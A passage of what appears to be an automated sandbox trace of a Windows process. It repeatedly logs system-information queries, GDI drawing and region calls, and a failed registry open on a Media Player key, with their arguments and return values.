lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.998] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.998] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.998] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.999] BeginPath (hdc=0x0) returned 0 [0089.999] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.999] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.999] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.999] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.999] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.999] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.999] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.999] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf70401dc [0089.999] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf90401d9 [0089.999] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104578b [0089.999] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104578c [0089.999] CombineRgn (hrgnDst=0x104578b, hrgnSrc1=0xf70401dc, hrgnSrc2=0xf90401d9, iMode=1) returned 1 [0089.999] CombineRgn (hrgnDst=0x104578c, hrgnSrc1=0xf70401dc, hrgnSrc2=0xf90401d9, iMode=4) returned 2 [0089.999] CreateSolidBrush (color=0xff) returned 0x210578a [0089.999] CreateSolidBrush (color=0xff0000) returned 0x110578d [0089.999] DeleteObject (ho=0x110578d) returned 1 [0089.999] DeleteObject (ho=0xf90401d9) returned 1 [0089.999] DeleteObject (ho=0xf70401dc) returned 1 [0090.000] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.000] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.000] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.000] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.000] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.000] BeginPath (hdc=0x0) returned 0 [0090.000] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.000] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.000] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.000] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.000] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.000] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.000] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.000] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.000] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfa0401d9 [0090.000] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf80401dc [0090.000] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104578e [0090.000] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104578f [0090.000] CombineRgn (hrgnDst=0x104578e, hrgnSrc1=0xfa0401d9, hrgnSrc2=0xf80401dc, iMode=1) returned 1 [0090.001] CombineRgn (hrgnDst=0x104578f, hrgnSrc1=0xfa0401d9, hrgnSrc2=0xf80401dc, iMode=4) returned 2 [0090.001] CreateSolidBrush (color=0xff) returned 0x210578d [0090.001] CreateSolidBrush (color=0xff0000) returned 0x1105790 [0090.001] DeleteObject (ho=0x1105790) returned 1 [0090.001] DeleteObject (ho=0xf80401dc) returned 1 [0090.001] DeleteObject (ho=0xfa0401d9) returned 1 [0090.001] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.001] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.001] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.001] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.001] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.001] BeginPath (hdc=0x0) returned 0 [0090.001] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.001] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.001] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.001] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.001] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.001] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.001] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.001] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.002] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf90401dc [0090.002] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfb0401d9 [0090.002] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045791 [0090.002] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045792 [0090.002] CombineRgn (hrgnDst=0x1045791, hrgnSrc1=0xf90401dc, hrgnSrc2=0xfb0401d9, iMode=1) returned 1 [0090.002] CombineRgn (hrgnDst=0x1045792, hrgnSrc1=0xf90401dc, hrgnSrc2=0xfb0401d9, iMode=4) returned 2 [0090.002] CreateSolidBrush (color=0xff) returned 0x2105790 [0090.002] CreateSolidBrush (color=0xff0000) returned 0x1105793 [0090.002] DeleteObject (ho=0x1105793) returned 1 [0090.002] DeleteObject (ho=0xfb0401d9) returned 1 [0090.002] DeleteObject (ho=0xf90401dc) returned 1 [0090.002] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.002] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.002] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.002] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.002] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.002] BeginPath (hdc=0x0) returned 0 [0090.002] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.002] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.002] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.002] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.002] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.002] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.003] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.003] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfc0401d9 [0090.003] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfa0401dc [0090.003] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045794 [0090.003] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045795 [0090.003] CombineRgn (hrgnDst=0x1045794, hrgnSrc1=0xfc0401d9, hrgnSrc2=0xfa0401dc, iMode=1) returned 1 [0090.003] CombineRgn (hrgnDst=0x1045795, hrgnSrc1=0xfc0401d9, hrgnSrc2=0xfa0401dc, iMode=4) returned 2 [0090.003] CreateSolidBrush (color=0xff) returned 0x2105793 [0090.003] CreateSolidBrush (color=0xff0000) returned 0x1105796 [0090.003] DeleteObject (ho=0x1105796) returned 1 [0090.003] DeleteObject (ho=0xfa0401dc) returned 1 [0090.003] DeleteObject (ho=0xfc0401d9) returned 1 [0090.003] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.003] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.003] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.003] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.003] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.003] BeginPath (hdc=0x0) returned 0 [0090.004] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.004] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.004] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.004] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.004] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.004] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.004] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.004] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.004] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfb0401dc [0090.004] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfd0401d9 [0090.004] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045797 [0090.004] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045798 [0090.004] CombineRgn (hrgnDst=0x1045797, hrgnSrc1=0xfb0401dc, hrgnSrc2=0xfd0401d9, iMode=1) returned 1 [0090.004] CombineRgn (hrgnDst=0x1045798, hrgnSrc1=0xfb0401dc, hrgnSrc2=0xfd0401d9, iMode=4) returned 2 [0090.004] CreateSolidBrush (color=0xff) returned 0x2105796 [0090.004] CreateSolidBrush (color=0xff0000) returned 0x1105799 [0090.004] DeleteObject (ho=0x1105799) returned 1 [0090.004] DeleteObject (ho=0xfd0401d9) returned 1 [0090.004] DeleteObject (ho=0xfb0401dc) returned 1 [0090.004] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.004] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.005] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.005] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.005] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.005] BeginPath (hdc=0x0) returned 0 [0090.005] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.005] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.005] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.005] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.005] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.005] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.005] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.005] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.005] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfe0401d9 [0090.005] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfc0401dc [0090.005] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104579a [0090.005] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104579b [0090.005] CombineRgn (hrgnDst=0x104579a, hrgnSrc1=0xfe0401d9, hrgnSrc2=0xfc0401dc, iMode=1) returned 1 [0090.005] CombineRgn (hrgnDst=0x104579b, hrgnSrc1=0xfe0401d9, hrgnSrc2=0xfc0401dc, iMode=4) returned 2 [0090.005] CreateSolidBrush (color=0xff) returned 0x2105799 [0090.005] CreateSolidBrush (color=0xff0000) returned 0x110579c [0090.006] DeleteObject (ho=0x110579c) returned 1 [0090.006] DeleteObject (ho=0xfc0401dc) returned 1 [0090.006] DeleteObject (ho=0xfe0401d9) returned 1 [0090.006] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.006] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.006] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.006] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.006] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.006] BeginPath (hdc=0x0) returned 0 [0090.006] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.006] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.006] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.006] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.006] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.006] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.006] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.006] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfd0401dc [0090.006] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xff0401d9 [0090.007] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104579d [0090.007] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104579e [0090.007] CombineRgn (hrgnDst=0x104579d, hrgnSrc1=0xfd0401dc, hrgnSrc2=0xff0401d9, iMode=1) returned 1 [0090.007] CombineRgn (hrgnDst=0x104579e, hrgnSrc1=0xfd0401dc, hrgnSrc2=0xff0401d9, iMode=4) returned 2 [0090.007] CreateSolidBrush (color=0xff) returned 0x210579c [0090.007] CreateSolidBrush (color=0xff0000) returned 0x110579f [0090.007] DeleteObject (ho=0x110579f) returned 1 [0090.007] DeleteObject (ho=0xff0401d9) returned 1 [0090.007] DeleteObject (ho=0xfd0401dc) returned 1 [0090.007] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.007] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.007] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.007] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.007] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.007] BeginPath (hdc=0x0) returned 0 [0090.007] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.007] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.007] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.007] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.007] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.007] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.007] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.008] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.008] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x401d9 [0090.008] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfe0401dc [0090.008] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457a0 [0090.008] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457a1 [0090.008] CombineRgn (hrgnDst=0x10457a0, hrgnSrc1=0x401d9, hrgnSrc2=0xfe0401dc, iMode=1) returned 1 [0090.008] CombineRgn (hrgnDst=0x10457a1, hrgnSrc1=0x401d9, hrgnSrc2=0xfe0401dc, iMode=4) returned 2 [0090.008] CreateSolidBrush (color=0xff) returned 0x210579f [0090.008] CreateSolidBrush (color=0xff0000) returned 0x11057a2 [0090.008] DeleteObject (ho=0x11057a2) returned 1 [0090.008] DeleteObject (ho=0xfe0401dc) returned 1 [0090.008] DeleteObject (ho=0x401d9) returned 1 [0090.008] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.008] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.008] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.008] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.008] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.008] BeginPath (hdc=0x0) returned 0 [0090.008] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.009] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.009] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.009] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.009] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.009] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.009] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.009] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.009] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xff0401dc [0090.009] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x10401d9 [0090.009] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457a3 [0090.009] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10457a4 [0090.009] CombineRgn (hrgnDst=0x10457a3, hrgnSrc1=0xff0401dc, hrgnSrc2=0x10401d9, iMode=1) returned 1 [0090.009] CombineRgn (hrgnDst=0x10457a4, hrgnSrc1=0xff0401dc, hrgnSrc2=0x10401d9, iMode=4) returned 2 [0090.009] CreateSolidBrush (color=0xff) returned 0x21057a2 [0090.009] CreateSolidBrush (color=0xff0000) returned 0x11057a5 [0090.009] DeleteObject (ho=0x11057a5) returned 1 [0090.009] DeleteObject (ho=0x10401d9) returned 1 [0090.009] DeleteObject (ho=0xff0401dc) returned 1 [0090.009] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.009] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.010] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.010] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.010] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.010] BeginPath (hdc=0x0) returned 0 [0090.010] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.010] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.010] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.010] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.010] 